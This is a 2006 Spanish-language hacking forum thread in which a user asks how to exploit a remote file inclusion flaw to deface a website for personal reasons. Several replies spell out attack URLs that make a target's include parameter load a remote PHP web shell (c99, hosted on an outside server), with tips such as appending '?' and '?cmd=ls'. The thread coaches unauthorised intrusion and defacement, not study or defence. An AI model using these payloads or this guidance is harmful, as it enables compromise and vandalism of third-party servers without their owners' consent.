NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
 Desconectado
Mensajes: 273
Respeto al sabio por sabiduria o por torpeza.
|
 |
« en: Octubre 03, 2006, 05:44:17 » |
|
Bueno necesito un empujon con una cosilla, e pasado el SSS a una pagina que quiero desfacear por motivos personales (no la pondre porque quiero hacerlo yo y aprender). Bueno me a dado una vulnerabilidad que me a llamado a atención. Es la siguiente: Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell Quisiera saver para que sirve esto, e puesto envez de victima la pagina que quiero en este caso victima.org y lo que viene a continuación y lo que me mostro fue la pagina de inicio normal. Alguien save como se puede aprovechar esta vulnerabilidad? Dsd ya Gracias ! Bye !
|
|
|
|
« Última modificación: Octubre 03, 2006, 02:11:27 por NorK »
|
En línea
|
|
|
|
anonimox
Visitante
|
|
« Respuesta #1 en: Octubre 03, 2006, 09:18:36 » |
|
la verdad que a todos los servidores q probe con esa vuln ninguna me sirvio...
y me paso lo mismo q te paso a vos....
salu2
|
|
|
|
|
En línea
|
|
|
|
|
|
The_novato
Visitante
|
|
« Respuesta #3 en: Octubre 04, 2006, 02:59:12 » |
|
|
|
|
|
|
En línea
|
|
|
|
computin
Visitante
|
|
« Respuesta #4 en: Octubre 05, 2006, 01:45:49 » |
|
en la parte donde dice SHELL tienes que poner una shell osea la direccion algo asi: webvulnerable.com/index.php?page=" SHELL" ahora en donde dice shell pones esto webvulnerable.com/index.php?page=
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer SesionPara eso tienes que tener una Shell y saber usarla es sencillo |
|
|
|
|
En línea
|
|
|
|
anonimox
Visitante
|
|
« Respuesta #5 en: Octubre 05, 2006, 06:33:05 » |
|
emm la verdad que yo si se eso....
pero igual no funciona asi...
salu2
|
|
|
|
|
En línea
|
|
|
|
|
|
arquimedes
Visitante
|
|
« Respuesta #7 en: Octubre 06, 2006, 07:38:05 » |
|
x experiencia propia digo q casi siempre al final de la shell ay q poner una interrogacion, Quedaria algo asi: http://webvulnerable.com/index.php?page=http://tuweb.com/shell.php?
|
|
|
|
|
En línea
|
|
|
|
|
|
|
|
3nst31n
Miembro
Desconectado
Mensajes: 71
Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!
|
|
« Respuesta #10 en: Octubre 06, 2006, 09:41:20 » |
|
x dona k sea tan pesimista xo hace 1 semanaa k intento hackear un foro kon el zen cart y nada de nada aki tienes la shell k uso. luego pones de shell.txt pones ?cmd=ls; kedarias algo asi Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesionte lo doy en txt x k una shell es un clavo ok? pues por un lado duele x el otro no, para darle la vuelta al clavo y k no te duela a ti sino a la web, le kambias el formato y lo de cmd=ls es para k se de kuenta k es un shell. son palabras textuales sacadas de este foro, x favor buska un poko k no kuesta nada^^ edit aki te doy un shell k en teoria es para el zen cart aunk a mi no me funciona !^^ Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion |
|
|
|
« Última modificación: Octubre 06, 2006, 09:49:22 por enstein »
|
En línea
|
|
|
|
arquimedes
Visitante
|
|
« Respuesta #11 en: Octubre 06, 2006, 02:04:34 » |
|
joder ay que poner algo de tu parte.Yo utilizo una shell rusa mu wena c99.este es el link: Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesionhttp://crashz.by.ru/shell/c99.txt Con esta tu codigo quedaria asi: http://webvulnerable.com/index.php?page=http://crashz.by.ru/shell/c99.txt? |
|
|
|
|
En línea
|
|
|
|
|
|
|
|
|
|
|
|
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
Desconectado
Mensajes: 273
Respeto al sabio por sabiduria o por torpeza.
|
|
« Respuesta #16 en: Octubre 07, 2006, 02:14:29 » |
|
Nose en que me equivoco, pongo esto Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesioncomo dijo arquimedes y me sale: Service Temporarily Unavailable The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later. Nose que ago mal, talvez sea alguna tonteria pero llevo 3 dias leiendo sin parar y no saco nada en claro. Bye! |
|
|
|
|
En línea
|
|
|
|
|
|
arquimedes
Visitante
|
|
« Respuesta #18 en: Octubre 07, 2006, 02:39:05 » |
|
el Link de esa shell esta perfecto, lo e utilizado recientemente y funciona perfectamente. Lo de que no os funciona puede ser x 2 cosas: 1.-La web ya esta parcheada.Lo cual explicaria el fallo de Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later. 2.-O q el bug que teneis no es correcto. Esto puede ser xq en el sss os a salido esto: Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell entonces para entrar n la pagina el link os quedaria asi: Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://crashz.by.ru/shell/c99.txt? |
|
|
|
|
En línea
|
|
|
|
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
Desconectado
Mensajes: 273
Respeto al sabio por sabiduria o por torpeza.
|
|
« Respuesta #19 en: Octubre 07, 2006, 02:50:28 » |
|
Vale e puesto esto: Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://crashz.by.ru/shell/c99.txt? y ahora me sale el index de la pagina pero es lo mismo que si pusiera Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesionwww.webdelavictima.com , nose que hacer.... Dsd ya gracias! |
|
|
|
|
En línea
|
|
|
|
arquimedes
Visitante
|
|
« Respuesta #20 en: Octubre 07, 2006, 05:19:54 » |
|
no se la uncia explicacion q l encuentro s q ese bug ya este subsanado o que este mal.
ya siento no poder ayudarte mas
|
|
|
|
|
En línea
|
|
|
|
|
|
|
|
Autor